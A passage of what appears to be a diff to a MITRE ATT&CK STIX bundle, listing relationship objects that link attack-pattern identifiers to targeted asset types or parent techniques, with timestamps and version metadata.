+ "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:37:25.214Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0a5002d3-cf0d-4e26-9fc4-8faff7f6578a", + "created": "2023-09-29T17:38:04.048Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:38:04.048Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0a5f48fa-efec-4018-b354-5867ab88f2ee", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0a680845-2fad-4578-a43c-476554cf57e8", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0a75a49b-1e28-4b6f-83d3-e940e69ff90d", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0a7810c5-850a-41e9-9d44-cbbdeebd8044", + "created": "2020-03-19T21:27:32.904Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0a89e003-35eb-49f2-a5dc-162250fc8c81", + "created": "2024-06-27T09:41:35.344Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:41:35.344Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0a8f5e7d-04d8-4ca8-a1d1-ea6a0ccc6140", + "created": "2020-06-09T15:33:13.766Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1", + "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0a9d0727-48a1-4048-99ec-4db04846c5eb", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0ab7df88-e235-4bd3-89d7-4b89b94b89af", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0ad2b49a-d35f-464c-a3c6-f9342977fefc", + "created": "2020-03-13T21:02:20.018Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--ce73ea43-8e77-47ba-9c11-5e9c9c58b9ff", + "target_ref": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0aed1f3e-d15c-4698-8df0-5769f65d20cd", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0b1c59e2-1027-4b85-a7a9-8b39551a9229", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0b2182c5-719f-4d4a-9b29-6800cc460b58", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0b24b8de-944d-49ea-a15f-cb732aeb31de", + "created": "2020-02-10T20:03:11.833Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0b2a6fc5-3416-4d78-96cb-f6325c91ab91", + "created": "2023-10-02T20:23:11.865Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:23:11.865Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0b2d0517-9943-413e-a6f9-30c6d5ce8c42", + "created": "2023-09-28T19:59:10.561Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:59:10.561Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0b66c798-f1fc-4e2f-b3b4-433dde89a191", + "created": "2020-01-24T13:41:32.702Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--68c96494-1a50-403e-8844-69a6af278c68", + "target_ref": "attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0b6cd19f-ee13-4224-9e22-f8a9e626d98f", + "created": "2023-09-28T21:22:48.239Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:22:48.239Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0b86ce78-fdf2-4ab9-a759-c10b17d2d106", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0b89cc4b-6031-40a6-b6e7-169b22fafdf2", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7decb26c-715c-40cf-b7e0-026f7d7cc215", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0b92b0f0-fdc0-4f20-98f3-ca2c1932de24", + "created": "2024-05-22T17:14:23.919Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-23T21:20:20.489Z", + "description": "Asset Mapping Rationale: Adversaries may impair command history logging to hide commands they run on a compromised system. Adversaries may also leverage a Network Device CLI on network devices to disable historical command logging.", + "relationship_type": "targets", + "source_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0b976c49-c7d3-471f-b8df-ef3d27e412ca", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0ba1db3a-389a-4937-975b-d2dc0142cb4b", + "created": "2023-09-29T18:46:22.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:46:22.739Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0bc44564-e7df-49b1-87dd-da04dbf3d04e", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0bc90405-24a9-4f84-a1bb-bf953dbca016", + "created": "2023-09-28T20:10:34.479Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:10:34.479Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0bd257e3-a5fb-43d7-aa99-7ec4164d5a01", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0bd403d4-260d-4dc2-8574-48b15b37dbd3", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0be618a0-f752-450f-8838-60c17fabd278", + "created": "2020-02-04T13:06:49.734Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", + "target_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0bf13f44-5f74-4637-b2b7-61c44f194d6e", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0c0b6033-90e0-4547-afb5-3fc44e01b6a9", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0c10914e-1e98-4fc3-a059-99904c9aea3d", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0c132e19-d9cd-41d0-87c5-42bf4543e2d1", + "created": "2024-06-27T09:31:36.120Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:31:36.120Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0c29bffb-78c0-43c0-8b99-f5155bfa0432", + "created": "2020-03-27T21:13:45.236Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0c36e832-8561-40fa-bb55-c18233f70b5b", + "created": "2024-06-25T13:20:00.752Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-25T13:20:00.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0c47eafa-4daa-47c3-8df7-5f6421855f95", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0c51a5be-f7be-4ea4-a3f6-36515e2df8b2", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0c72593d-fcc6-4023-8771-bed5e243310e", + "created": "2023-09-28T21:24:37.417Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:24:37.417Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0cab29c6-d196-47b0-8621-10ac3c8a95d8", + "created": "2023-09-28T19:51:27.775Z", + "created_by_ref": 